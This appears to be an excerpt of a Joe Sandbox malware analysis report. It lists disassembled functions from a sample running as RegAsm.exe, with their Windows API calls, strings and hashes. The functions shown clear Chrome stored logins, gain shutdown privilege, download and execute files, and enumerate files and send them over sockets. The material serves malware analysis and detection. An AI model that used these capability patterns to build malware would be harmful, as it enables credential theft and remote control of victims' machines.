              • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
              • Opcode Fuzzy Hash: e30b5f6ce4cbdd366537afe2320d9bfcb0a6543311229dd69bf6235dce3d7422
              • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
              Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 00449212
              • _free.LIBCMT ref: 00449236
              • _free.LIBCMT ref: 004493BD
              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
              • _free.LIBCMT ref: 00449589
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$ByteCharMultiWide$InformationTimeZone
              • String ID:
              • API String ID: 314583886-0
              • Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
              • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
              • Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
              • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
              Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
              • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
              • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
              • GetProcAddress.KERNEL32(00000000), ref: 00416872
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
              • String ID: !D@$PowrProf.dll$SetSuspendState
              • API String ID: 1589313981-2876530381
              • Opcode ID: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
              • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
              • Opcode Fuzzy Hash: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
              • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
              Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
              • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
              • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: InfoLocale
              • String ID: ACP$OCP$['E
              • API String ID: 2299586839-2532616801
              • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
              • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
              • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
              • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
              Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
              Download Yara Rule
              APIs
              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
              • GetLastError.KERNEL32 ref: 0040BA58
              Strings
              • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
              • UserProfile, xrefs: 0040BA1E
              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
              • [Chrome StoredLogins not found], xrefs: 0040BA72
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: DeleteErrorFileLast
              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
              • API String ID: 2018770650-1062637481
              • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
              • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
              • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
              • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
              Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
              Download Yara Rule
              APIs
              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
              • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
              • GetLastError.KERNEL32 ref: 0041799D
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
              • String ID: SeShutdownPrivilege
              • API String ID: 3534403312-3733053543
              • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
              • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
              • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
              • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
              Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00409258
                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
              • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
              • FindClose.KERNEL32(00000000), ref: 004093C1
                • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
              • FindClose.KERNEL32(00000000), ref: 004095B9
                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
              • String ID:
              • API String ID: 1824512719-0
              • Opcode ID: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
              • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
              • Opcode Fuzzy Hash: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
              • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
              Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
              Download Yara Rule
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
              • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
              • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
              • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ManagerStart
              • String ID:
              • API String ID: 276877138-0
              • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
              • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
              • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
              • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
              Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
              Download Yara Rule
              APIs
              • FindResourceA.KERNEL32 ref: 0041B4B9
              • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
              • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
              • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Resource$FindLoadLockSizeof
              • String ID: SETTINGS
              • API String ID: 3473537107-594951305
              • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
              • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
              • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
              • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
              Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 0040966A
              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
              • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Find$File$CloseFirstH_prologNext
              • String ID:
              • API String ID: 1157919129-0
              • Opcode ID: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
              • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
              • Opcode Fuzzy Hash: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
              • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
              Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00408811
              • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
              • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
              • String ID:
              • API String ID: 1771804793-0
              • Opcode ID: 24d131f499e64054f79a0f46ecbae19e6fc47dfee84614c45b7e196f831b81b6
              • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
              • Opcode Fuzzy Hash: 24d131f499e64054f79a0f46ecbae19e6fc47dfee84614c45b7e196f831b81b6
              • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
              Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
              Download Yara Rule
              APIs
              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: DownloadExecuteFileShell
              • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$open
              • API String ID: 2825088817-1632494013
              • Opcode ID: d5b821e171253cb396676c05401a8d63c0a5d85931093b1fd4d20512fa7d7d3c
              • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
              • Opcode Fuzzy Hash: d5b821e171253cb396676c05401a8d63c0a5d85931093b1fd4d20512fa7d7d3c
              • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
              Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: FileFind$FirstNextsend
              • String ID: XPG$XPG
              • API String ID: 4113138495-1962359302
              • Opcode ID: 8ee3c4b34050bfc3eb39b734b42787355f0f4c7cc0427839037de91a24499d9f
              • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
              • Opcode Fuzzy Hash: 8ee3c4b34050bfc3eb39b734b42787355f0f4c7cc0427839037de91a24499d9f
              • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
              Function 00451CD8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
              • String ID: sJD
              • API String ID: 1661935332-3536923933
              • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
              • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
              • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
              • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
              Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorInfoLastLocale$_free$_abort
              • String ID:
              • API String ID: 2829624132-0
              • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
              • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
              • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
              • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
              Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
              • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
              • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
              • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
              • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
              • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
              Function 004432B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
              • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
              • ExitProcess.KERNEL32 ref: 004432EF
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
              • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
              • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
              • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
              Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Clipboard$CloseDataOpen
              • String ID:
              • API String ID: 2058664381-0
              • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
              • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
              • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
              • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
              Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: .
              • API String ID: 0-248832578
              • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
              • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
              • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
              • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
              Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem_abort_free
              • String ID: lJD
              • API String ID: 1084509184-3316369744
              • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
              • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
              • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
              • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
              Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem_abort_free
              • String ID: lJD
              • API String ID: 1084509184-3316369744
              • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
              • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
              • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
              • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
              Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: InfoLocale
              • String ID: GetLocaleInfoEx
              • API String ID: 2299586839-2904428671
              • Opcode ID: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
              • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
              • Opcode Fuzzy Hash: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
              • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
